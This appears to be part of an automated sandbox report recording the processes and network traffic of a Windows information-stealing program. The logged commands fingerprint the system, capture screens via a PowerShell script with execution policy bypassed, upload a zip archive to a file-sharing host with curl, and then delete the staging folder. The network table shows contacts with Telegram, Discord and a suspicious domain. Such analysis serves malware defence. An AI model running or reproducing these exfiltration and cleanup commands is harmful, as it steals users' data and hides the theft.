C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";"
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Tmuacblb.zip";
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffee031ab58,0x7ffee031ab68,0x7ffee031ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3056 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3560 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4496 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4908 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed84746f8,0x7ffed8474708,0x7ffed8474718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2008 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5672 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=2136 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6128 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4704 --field-trial-handle=1916,i,12875924558297911042,14565832975868107828,131072 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,11835283909503614669,13383179489750282584,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2916 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 232.138.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.171:443 | www.bing.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 171.61.62.23.in-addr.arpa | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.filedoge.com | udp |
| DE | 49.13.193.134:443 | api.filedoge.com | tcp |
| US | 8.8.8.8:53 | 134.193.13.49.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.90.14.23.in-addr.arpa | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | www.myexternalip.com | udp |
| US | 34.117.118.44:443 | www.myexternalip.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | mrbfederali.cam | udp |
| US | 104.21.93.60:443 | mrbfederali.cam | tcp |
| US | 8.8.8.8:53 | 44.118.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.93.21.104.in-addr.arpa | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.187.206:443 | apis.google.com | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 142.250.200.46:443 | play.google.com | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 46.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 216.58.213.14:443 | clients2.google.com | udp |
| GB | 216.58.213.14:443 | clients2.google.com | tcp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roblox.com | udp |
| FR | 128.116.122.4:443 | roblox.com | tcp |
| FR | 128.116.122.4:443 | roblox.com | tcp |
| US | 8.8.8.8:53 | www.roblox.com | udp |
| DE | 128.116.44.4:443 | www.roblox.com | tcp |
| US | 8.8.8.8:53 | css.rbxcdn.com | udp |
| US | 8.8.8.8:53 | static.rbxcdn.com | udp |
| US | 8.8.8.8:53 | js.rbxcdn.com | udp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| BE | 23.14.90.112:443 | css.rbxcdn.com | tcp |
| DE | 18.173.154.19:443 | static.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| BE | 23.14.90.98:443 | js.rbxcdn.com | tcp |
| US | 8.8.8.8:53 | 4.122.116.128.in-addr.arpa | udp |
